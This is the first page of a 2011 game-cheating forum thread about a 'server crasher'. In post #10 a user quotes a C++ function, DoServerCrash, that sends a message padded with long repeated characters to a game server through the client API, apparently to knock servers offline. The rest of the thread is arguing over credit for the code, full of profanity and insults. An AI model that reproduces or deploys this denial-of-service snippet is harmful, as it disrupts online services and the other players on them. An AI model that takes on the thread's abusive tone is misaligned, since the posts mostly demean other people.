Thread: Server crasher

Page 1 of 3 123 LastLast
Results 1 to 15 of 39
  1. #1
    jajarem64's Avatar
    Join Date
    Aug 2008
    Gender
    male
    Location
    Sarasota, FL - USA
    Posts
    318
    Reputation
    -13
    Thanks
    17
    My Mood
    Relaxed

    Smile Server crasher

    No more flaming. I won't release anything of the liking again. I just thought it would be a nice release for the coders who're trying to get their stuff together that're sipping on red bull's all night and chain smoking all stressed out with no sleep, no shower for days trying their best to code. I released it because I'm a nice guy, and for the simple fact of that we have all been there at the beginning of our coding career and it sucks.
    Last edited by jajarem64; 02-17-2011 at 08:33 PM.

  2. #2
    kotentopf's Avatar
    Join Date
    Nov 2009
    Gender
    male
    Posts
    602
    Reputation
    26
    Thanks
    251
    EDIT:
    Dear mmbob, sorry that he is leeching ur base
    In Love
    Ur Kotentopf

    P.S. the food is at the table
    Last edited by kotentopf; 02-17-2011 at 04:13 PM.
    The Internet SHOULD Be Illegal

    When you say
    "Java is a great programming language because it works on all platforms"
    it is just like
    "anal sex is great because it works on all genders"

    Are YOU a Troll?

  3. #3
    Stephen's Avatar
    Join Date
    Jun 2009
    Gender
    male
    Location
    Engine.exe
    Posts
    4,690
    Reputation
    184
    Thanks
    1,147
    My Mood
    Aggressive
    How did you get mmbob's base...?

  4. #4
    jajarem64's Avatar
    Join Date
    Aug 2008
    Gender
    male
    Location
    Sarasota, FL - USA
    Posts
    318
    Reputation
    -13
    Thanks
    17
    My Mood
    Relaxed
    You know, no1 has taken the time to figure out who I am but that plays a big part in it, on the how to.
    Btw Kotentopf it's fixed. Will you be needing anything else?

  5. #5
    Stephen's Avatar
    Join Date
    Jun 2009
    Gender
    male
    Location
    Engine.exe
    Posts
    4,690
    Reputation
    184
    Thanks
    1,147
    My Mood
    Aggressive
    Quote Originally Posted by jajarem64 View Post
    You know, no1 has taken the time to figure out who I am but that plays a big part in it, on the how to.
    Btw Kotentopf it's fixed. Will you be needing anything else?
    mmbob just told me, your from RDG.

  6. #6
    jajarem64's Avatar
    Join Date
    Aug 2008
    Gender
    male
    Location
    Sarasota, FL - USA
    Posts
    318
    Reputation
    -13
    Thanks
    17
    My Mood
    Relaxed
    I'm not from RDG LOL wow I've had so much beef with RDG it's not even funny. That's a fucking insult to my intelligence RDG can lick the sweat off the hair of my balls and that's all they'll ever get. Those thirsty cunt bitches... Take a nice long look at my credits and maybe you'll figure out who I am.

  7. #7
    NOOBJr's Avatar
    Join Date
    Jul 2010
    Gender
    male
    Location
    in NOOB
    Posts
    1,426
    Reputation
    112
    Thanks
    693
    No one will understand what to do with this. Because most of you are missing a certain sdk. the f.e.a.r of server crash might come back

  8. #8
    Stephen's Avatar
    Join Date
    Jun 2009
    Gender
    male
    Location
    Engine.exe
    Posts
    4,690
    Reputation
    184
    Thanks
    1,147
    My Mood
    Aggressive
    You sir fail. Your in the credits for changing shit?

    Original
    Code:
    REMOVED.
    Wow, you changed alot of shit.

    ----


    ----
    Last edited by Stephen; 02-18-2011 at 01:07 PM.

  9. The Following User Says Thank You to Stephen For This Useful Post:

    kotentopf (02-17-2011)

  10. #9
    mmbob's Avatar
    Join Date
    Dec 2009
    Gender
    male
    Location
    ja
    Posts
    655
    Reputation
    70
    Thanks
    1,156
    My Mood
    Bitchy
    I thought you were done posting source or something like that?

  11. #10
    NOOBJr's Avatar
    Join Date
    Jul 2010
    Gender
    male
    Location
    in NOOB
    Posts
    1,426
    Reputation
    112
    Thanks
    693
    Quote Originally Posted by Stephen View Post
    You sir fail. Your in the credits for changing shit?

    Original
    Code:
    void CBase::DoServerCrash(int Value)
    {
    	if (Value == 0)
    		return;
    
    	CAutoMessage Msg;
    	Msg.Writeuint8(104);
    	Msg.WriteWString((wchar_t*) L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
    	g_LTClient->SendToServer(Msg.Read(), MESSAGE_GUARANTEED);
    }
    Wow, you changed alot of shit.

    ----


    ----

    To him, changing the Msg.WriteWString makes it his own code

  12. The Following 2 Users Say Thank You to NOOBJr For This Useful Post:

    -P-a-i-d- (02-28-2011),Stephen (02-17-2011)

  13. #11
    jajarem64's Avatar
    Join Date
    Aug 2008
    Gender
    male
    Location
    Sarasota, FL - USA
    Posts
    318
    Reputation
    -13
    Thanks
    17
    My Mood
    Relaxed
    I figured this wouldn't be a big problem on releasing. Because first of all it's pretty choob proof like Zane's post is interpreted as and then it's something that "good" coders who actually deserve it, should have. Btw, I'm not from RDG and I am not a leecher and also the message wasn't originally A^ it was changed around as it was passed down. I gave you credits didn't I? You guys are to much like a high school groupie group keeping everything under the table not helping people out. What's funny is you will say "Oh if we give you a good base for free and stuff you won't learn how to code" That's really not true cause most of the coders here now have learned completely off of MMBob's base without ever reading a single Tut and now they have their own sites selling VIP and shit so don't make it such a big deal.

  14. #12
    yoyoman4567's Avatar
    Join Date
    Nov 2010
    Gender
    male
    Posts
    205
    Reputation
    9
    Thanks
    4
    My Mood
    Happy
    dose this thing even work at all?

  15. #13
    jajarem64's Avatar
    Join Date
    Aug 2008
    Gender
    male
    Location
    Sarasota, FL - USA
    Posts
    318
    Reputation
    -13
    Thanks
    17
    My Mood
    Relaxed
    Quote Originally Posted by yoyoman4567 View Post
    dose this thing even work at all?
    It work's 100% if you know how to implement it into your base the right way.

  16. #14
    Stephen's Avatar
    Join Date
    Jun 2009
    Gender
    male
    Location
    Engine.exe
    Posts
    4,690
    Reputation
    184
    Thanks
    1,147
    My Mood
    Aggressive
    Quote Originally Posted by jajarem64 View Post
    I figured this wouldn't be a big problem on releasing. Because first of all it's pretty choob proof like Zane's post is interpreted as and then it's something that "good" coders who actually deserve it, should have. Btw, I'm not from RDG and I am not a leecher and also the message wasn't originally A^ it was changed around as it was passed down.
    Would you like to prove to me that you know C++? Because I probably would whoop your white ass.

  17. The Following User Says Thank You to Stephen For This Useful Post:

    NOOBJr (02-17-2011)

  18. #15
    jajarem64's Avatar
    Join Date
    Aug 2008
    Gender
    male
    Location
    Sarasota, FL - USA
    Posts
    318
    Reputation
    -13
    Thanks
    17
    My Mood
    Relaxed
    Quote Originally Posted by Stephen View Post


    Would you like to prove to me that you know C++? Because I probably would whoop your white ass.
    Your lack of intelligence proves to show with your ignorance and childish use of words. Go fuck yourself.

Page 1 of 3 123 LastLast